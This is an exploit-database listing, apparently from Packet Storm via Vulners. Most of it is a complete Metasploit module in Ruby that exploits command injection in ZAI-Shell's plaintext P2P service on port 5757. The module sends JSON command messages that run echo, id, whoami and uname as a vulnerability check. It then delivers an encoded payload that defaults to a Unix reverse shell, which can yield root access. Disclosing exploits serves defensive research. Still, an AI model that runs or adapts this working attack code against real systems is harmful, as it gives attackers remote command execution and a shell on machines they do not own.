Lucene search
K

📄 ZAI-Shell P2P Command Injection

🗓️ 27 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 107 Views

ZAI-Shell P2P command injection on port 5757; AutoCheck uses echo, id, uname to assess vulnerability.

Code
=============================================================================================================================================
    | # Title     : ZAI-Shell P2P Command Injection Metasploit Module                                                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://github.com/TaklaXBR/zai-shell                                                                                       |
    =============================================================================================================================================
    
    [+] Summary    : This Metasploit module targets a command injection vulnerability in ZAI-Shell when running in no_ai_mode. 
                     The exploit communicates over a plaintext P2P protocol (default port 5757) and sends crafted JSON messages to execute arbitrary system commands on the target.
                     The module includes an enhanced AutoCheck mechanism that performs multiple verification steps (echo, id/whoami, and uname) to reliably determine vulnerability 
    				 status before exploitation. It classifies the target as Vulnerable, Appears, or Safe based on execution indicators.
    [+] POC : 
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    require 'json'
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = NormalRanking
    
      include Msf::Exploit::Remote::Tcp
      prepend Msf::Exploit::Remote::AutoCheck  
    
      def initialize(info = {})
        super(update_info(info,
          'Name'            => 'ZAI-Shell P2P Command Injection',
          'Description'     => %q{
            This module exploits a command injection vulnerability in ZAI-Shell when running in 'no_ai_mode'.
            It sends commands via the text-based P2P protocol and captures the results.
            
            Important Note: If the ZAI-Shell service is running with root privileges (common for daemons),
            the exploit will grant root access on the target system.
          },
          'Author'          => [ 'indoushka' ],
          'License'         => MSF_LICENSE,
          'References'      => [
            [ 'URL', 'https://example.com/zai-shell-vuln' ],
          ],
          'DisclosureDate' => '2024-01-15',
          'Platform'        => ['unix', 'linux'],
          'Arch'            => [ARCH_CMD],
          'Privileged'      => false,  # Exploit doesn't require prior privileges, but impact may be root
          'Targets'         => [
            [ 'Unix Command', {
              'Arch' => ARCH_CMD,
              'Platform' => ['unix', 'linux']
            }]
          ],
          'DefaultTarget'  => 0,
          'DefaultOptions' => {
            'PAYLOAD' => 'cmd/unix/reverse',  
            'SSL' => false                   
          },
          'Notes' => {
            'Stability' => [CRASH_SAFE],
            'Reliability' => [REPEATABLE_SESSION],  
            'SideEffects' => [IOC_IN_LOGS]
          }
        ))
    
        register_options([
          Opt::RPORT(5757),
          OptString.new('PEER_NAME', [false, 'Peer name', 'Metasploit']),
          OptInt.new('TIMEOUT', [true, 'Connection timeout in seconds', 10]),
          OptBool.new('WAIT_FOR_OUTPUT', [true, 'Wait for command output', true]),
          OptString.new('TEST_STRING', [true, 'Unique test string for vulnerability verification', Rex::Text.rand_text_alpha(8)])
        ])
      end
    
      def check
        test_string = datastore['TEST_STRING']
        vuln_indicators = 0
        
        begin
          connect
    
          hello_msg = { 'type' => 'hello', 'name' => 'Checker' }.to_json + "\n"
          sock.put(hello_msg)
    
          read_responses(3)
    
          cmd1 = "echo #{test_string}"
          responses1 = send_command_and_read(cmd1)
    
          cmd2 = "id 2>/dev/null || whoami 2>/dev/null || echo 'ID_FAIL'"
          responses2 = send_command_and_read(cmd2)
    
          cmd3 = "uname -a 2>/dev/null || echo 'UNAME_FAIL'"
          responses3 = send_command_and_read(cmd3)
    
          if responses1.any? { |r| r.include?(test_string) }
            print_good("First confirmation: echo executed successfully")
            vuln_indicators += 1
          end
    
          if responses2.any? { |r| r =~ /uid=\d+/ }
            print_good("Second confirmation: id executed successfully")
            vuln_indicators += 1
          elsif responses2.any? { |r| r =~ /^[a-zA-Z0-9_]+$/ && r.length < 20 }
            print_good("Second confirmation: whoami executed successfully")
            vuln_indicators += 1
          end
    
          if responses3.any? { |r| r.length > 5 && !r.include?('UNAME_FAIL') }
            print_good("Third confirmation: uname executed successfully")
            vuln_indicators += 1
          end
    
          if vuln_indicators >= 2
            print_good("Target shows clear vulnerability (indicators: #{vuln_indicators})")
            return CheckCode::Vulnerable
          elsif vuln_indicators >= 1
            print_warning("Target might be vulnerable (indicators: #{vuln_indicators})")
            return CheckCode::Appears
          else
            print_status("Target does not show any indicators of vulnerability")
            return CheckCode::Safe
          end
          
        rescue ::Rex::ConnectionError
          return CheckCode::Safe
        rescue ::Timeout::Error
          return CheckCode::Unknown
        ensure
          disconnect
        end
      end
    
      def exploit
        print_status("Starting exploit on target #{rhost}:#{rport}")
        
        connect
    
        send_hello
        send_payload
        Rex.sleep(2)
        if datastore['WAIT_FOR_OUTPUT']
          handle_command_output
        end
      
    rescue ::Rex::ConnectionError => e
        fail_with(Failure::Unreachable, "Connection failed: #{e}")
      rescue ::Timeout::Error
        fail_with(Failure::TimeoutExpired, "Connection timeout expired")
      rescue => e
        print_error("Unexpected error: #{e.class} - #{e}")
        elog(e)
      ensure
    
        disconnect
      end
    
      private
    
      def send_command_and_read(command)
        cmd_msg = { 'type' => 'command', 'command' => command }.to_json + "\n"
        sock.put(cmd_msg)
        read_responses(datastore['TIMEOUT'])
      end
    
      def read_responses(timeout = nil)
        timeout ||= datastore['TIMEOUT']
        responses = []
        result = ''
        
        begin
          time_start = Time.now
          
          while Time.now - time_start < timeout
            if sock.has_read_data?(0.5)
              data = sock.get_once(4096)
              if data
                result << data
    
                lines = result.split("\n")
                result = lines.pop.to_s  
                
                lines.each do |line|
                  parsed = parse_json_line(line)
                  responses << parsed if parsed
                end
              end
            else
    
              if !result.empty? && (Time.now - time_start > 1)
    
                parsed = parse_json_line(result)
                responses << parsed if parsed
                result = ''
                break
              end
            end
            Rex.sleep(0.1)
          end
    
          if !result.empty?
            parsed = parse_json_line(result)
            responses << parsed if parsed
          end
          
        rescue ::EOFError
    
          if !result.empty?
            parsed = parse_json_line(result)
            responses << parsed if parsed
          end
        end
        
        responses
      end
    
      def parse_json_line(line)
        line = line.strip
        return line if line.empty?
        
        begin
          parsed = JSON.parse(line)
          if parsed.is_a?(Hash)
    
            return parsed['output'] if parsed['output']
            return parsed['result'] if parsed['result']
            return parsed['data'] if parsed['data']
            return parsed['message'] if parsed['message']
            return parsed.to_s
          end
        rescue JSON::ParserError
    
        end
        
        line
      end
    
      def send_hello
        peer_name = datastore['PEER_NAME'] || 'Attacker'
        hello_msg = { 'type' => 'hello', 'name' => peer_name }.to_json + "\n"
        sock.put(hello_msg)
        
        # Read hello response
        hello_responses = read_responses(5)
        hello_responses.each do |resp|
          print_status("Peer response: #{resp[0..100].strip}") if resp && !resp.empty?
        end
      end
    
      def send_payload
        cmd = payload.encoded
        print_status("Sending payload: #{cmd[0..100]}#{cmd.length > 100 ? '...' : ''}")
        
        cmd_msg = {
          'type' => 'command',
          'command' => cmd
        }.to_json + "\n"
        
        sock.put(cmd_msg)
      end
    
      def handle_command_output
        print_status("Waiting for execution result...")
        
        output_responses = read_responses(datastore['TIMEOUT'] * 2)
        
        if output_responses.any?
          print_good("Execution result:")
          output_responses.each do |resp|
            next if resp.nil? || resp.empty?
    
            resp.to_s.each_line do |line|
              print_line("  #{line.chomp}") unless line.strip.empty?
            end
          end
    
          combined = output_responses.join(' ')
          if combined =~ /uid=(\d+)/
            uid = $1.to_i
            print_good("Executed with User ID: #{uid}")
            if uid == 0
              print_good("Executed with root privileges!")
            end
          end
        else
          print_warning("No output received from the command")
        end
      end
    end
    
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Feb 2026 00:00Current
6.4Medium risk
Vulners AI Score6.4
107